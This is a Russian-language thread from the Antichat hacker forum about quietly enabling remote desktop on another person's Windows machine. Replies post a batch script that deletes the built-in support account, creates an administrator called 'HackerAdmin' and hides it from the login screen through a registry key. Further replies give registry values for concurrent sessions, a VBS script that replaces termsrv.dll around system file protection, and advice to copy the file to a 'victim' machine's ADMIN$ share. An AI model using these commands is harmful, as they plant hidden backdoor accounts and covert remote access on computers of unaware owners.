Форум АНТИЧАТ - Включение rdp

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Включение rdp (https://forum.antichat.xyz/showthread.php?t=172961)

Включение rdp

Народ, вот у меня такая проблема:
Прописал параметр в реестр, что бы включить возможность подключения через rdp, но при входе, пишет, мол одна учетная запись уже работает
Как можно это изменить, и желательно без палевно?

Хм,насчет беспалевности затрудняюсь ответить. Возможен такой вариант(я так через телнет иногда подключаюсь). Сразу скажу,что это самый палевный вариант из все возможных :)
Пишешь батник:

Код:

chcp 1251

net user SUPPORT_388945a0 /delete

net user HackerAdmin mygoodpassword /add

net localgroup Администраторы hacker /add

net localgroup Пользователи SUPPORT_388945a0 /del

regedit /s conf.reg

(SUPPORT_388945a0 для xp prof и 2003сервер)
т.е. добавляешь нового пользователя с админскими правами и удаляешь первоначального.

Но т.к. при создании нового администратора, он будет виден в Вэлком Скрине, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.reg

Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 

NTCurrentVersionWinlogonSpecialAccountsUserLis t]

"HackerAdmin"=dword:00000000

Безусловно,это не весь батник,а лишь его основа.

это я и так знаю)) но спасибо за помощ

Цитата:

Сообщение от OPF_Nik

это я и так знаю)) но спасибо за помощ

У тебя есть возможность подойти к ПК локально?:)..

Если есть, и на нем установлена OC Windows XP, то делай так, ну а потом извращайся:).. Если честно, то не пробовал такой способ сам..
Я заменял библиотеку termsrv на самую раннюю, она еще с беты(если не ошибаюсь)..
Если этот способ не поможет, то отпишись, опишу другой:)..

Цитата:

Сообщение от TheBloodTear

хм. ну напиши другой.

Цитата:

Сообщение от p.r0phe.t

хм. ну напиши другой.

Для этого сначала надо будет скачать вот эту библиотеку..

Потом проделать это:
1) Создай такие ключи:

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core\EnableConcurrentSessions", "00000001", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Wi ndows NT\Terminal Services\MaxInstanceCount", "00000003", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions ", "00000001", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LogonType", "00000001", "REG_DWORD"

2) Замени системную библиотеку на скачанную (только замена руками очень затруднительна, т.к. система хорошо следит за целостностью, я использую vbs-скрипты или подобное):

system_folder = "c:\windows\system32\"
system_cache = "c:\windows\system32\dllcache\"
new_dll = "termsrv.dll"
cache_dll = "C:\windows\system32\dllcache\termsrv.dll"
old_dll = "C:\windows\system32\termsrv.dll"
old_name = "termsrv_old.dll"

fso.MoveFile cache_dll, system_cache & old_name
fso.CopyFile new_dll, system_cache, true
fso.MoveFile old_dll, system_folder & old_name
fso.CopyFile new_dll, system_folder, true

3) Система ругнется на то, что целостность улетела в аут, и предложит восстановить все, жмите не надо, перезагрузитесь, и пробуйте:)..

Отпишитесь, заработает или нет.. Если нет, попробую сделать exe-шник для всех этих махинаций:)..

TheBloodTear надо будет попробывать, спс
Но вообще, доступ удаленый

Цитата:

Сообщение от OPF_Nik

Но вообще, доступ удаленый

Ну как я понимаю пасс админа ты знаешь, так что копируй по этому пути:
\\жертва\ADMIN$ :)..

Единственная проблема это защитник системный файлов, он ругнется в консольный сеанс, но я думаю потом выложу чтонить против него:)..

Ну а если RDP по инету, то просто разок подчикирь человека и выбей, а потом глумись:)..

Цитата:

Сообщение от OPF_Nik

Придется заменить родную termsrv.dll или пропатчить её. Почитай вот это